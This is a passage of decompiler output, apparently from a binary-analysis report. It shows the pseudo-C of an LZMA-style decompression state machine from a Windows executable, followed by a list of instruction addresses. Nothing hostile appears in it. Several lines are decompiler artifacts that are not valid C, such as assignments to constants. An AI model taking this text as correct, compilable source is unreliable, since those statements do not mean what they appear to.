								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406c5b
0x00406c5b
0x00406c60
0x00406cd7
0x00406cde
0x00406ce8
0x004072c7
0x004072c7
0x004072ca
0x004072ca
0x004072d0
0x004072d6
0x004072dc
0x004072f6
0x004072f9
0x004072ff
0x0040730a
0x0040730c
0x004072de
0x004072de
0x004072ed
0x004072f1
0x004072f1
0x00407316
0x0040733d
0x0040733d
0x00407343
0x00407343
0x00000000
0x00407318
0x00407318
0x0040731c
0x004074cb
0x00000000
0x004074cb
0x00407328
0x0040732f
0x00407337
0x0040733a
0x00000000
0x0040733a
0x00406c62
0x00406c62
0x00406c66
0x00406c6e
0x00406c71
0x00406c73
0x00406c76
0x00406c78
0x00406c7d
0x00406c80
0x00406c87
0x00406c8e
0x00406c91
0x00406c9c
0x00406ca4
0x00406ca4
0x00406c9e
0x00406c9e
0x00406c9e
0x00406c93
0x00406c93
0x00406c93
0x00406cab
0x00406cc9
0x00406ccb
0x00406e9e
0x00406e9e
0x00406ea1
0x00406ea4
0x00406ea7
0x00406eaa
0x00406ead
0x00406eb0
0x00406eb3
0x00406eb6
0x00406ebc
0x00406ed4
0x00406ed7
0x00406eda
0x00406edd
0x00406edd
0x00406ee0
0x00406ee6
0x00406ebe
0x00406ebe
0x00406ec6
0x00406ecb
0x00406ecd
0x00406ecf
0x00406ecf
0x00406ef0
0x00406ef3
0x00406e96
0x00406e9c
0x00000000
0x00000000
0x00000000
0x00406ef5
0x00406e71
0x00406e75
0x0040747d
0x00000000
0x0040747d
0x00406e7b
0x00406e7e
0x00406e81
0x00406e85
0x00406e88
0x00406e8e
0x00406e90
0x00406e90
0x00406e93
0x00000000
0x00406e93
0x00406cad
0x00406cad
0x00406cb0
0x00406cb6
0x00406cb8
0x00406cb8
0x00406cbb
0x00406cbe
0x00406cc0
0x00406cc1
0x00406cc4
0x00406d31
0x00406d31
0x00406d35
0x00406d38
0x00406d3b
0x00406d3e
0x00406d41
0x00406d42
0x00406d45
0x00406d47
0x00406d4d
0x00406d50
0x00406d53
0x00406d56
0x00406d59
0x00406d5f
0x00406d7b
0x00406d7e
0x00406d81
0x00406d84
0x00406d8b
0x00406d91
0x00406d95
0x00406d61
0x00406d61
0x00406d65
0x00406d6d
0x00406d72
0x00406d74
0x00406d76
0x00406d76
0x00406d9f
0x00406da2
0x00406d19
0x00406d19
0x00406d1f
0x00406dd2
0x00406dd8
0x00000000
0x00000000
0x00406dda
0x00406ddd
0x00406de0
0x00406de3
0x00406de6
0x00406de9
0x00406dec
0x00406def
0x00406df2
0x00406df8
0x00406e10
0x00406e13
0x00406e16
0x00406e19
0x00406e19
0x00406e1c
0x00406e22
0x00406dfa
0x00406dfa
0x00406e02
0x00406e07
0x00406e09
0x00406e0b
0x00406e0b
0x00406e2c
0x00406e2f
0x00406dad
0x00406db1
0x00407471
0x00000000
0x00407471
0x00406db7
0x00406dba
0x00406dbd
0x00406dc1
0x00406dc4
0x00406dca
0x00406dcc
0x00406dcc
0x00406dcf
0x00406dcf
0x00406e2f
0x00406e36
0x00406e36
0x00406e36
0x00406e3a
0x00406e3a
0x00406e3d
0x00406e40
0x00406e44
0x00407489
0x00000000
0x00407489
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5e
0x00406e61
0x00406e64
0x00406e67
0x00406e69
0x00406e69
0x00406e69
0x00407006
0x00407006
0x00407009
0x00407009
0x00000000
0x00407009
0x00406d2b
0x00000000
0x00000000
0x00000000
0x00406da8
0x00406cf4
0x00406cf8
0x00407465
0x004074e1
0x004074e9
0x004074f0
0x004074f2
0x004074f9
0x004074fd
0x004074fd
0x00406cfe
0x00406d01
0x00406d04
0x00406d08
0x00406d0b
0x00406d11
0x00406d13
0x00406d13
0x00406d16
0x00000000
0x00406d16
0x00406da2
0x00406cab
0x00406adf
0x00406adf
0x00406ae8
0x004074f6
0x004074f6
0x00000000
0x004074f6
0x00406aee
0x00000000
0x00406af9
0x00000000
0x00000000
0x00406b02
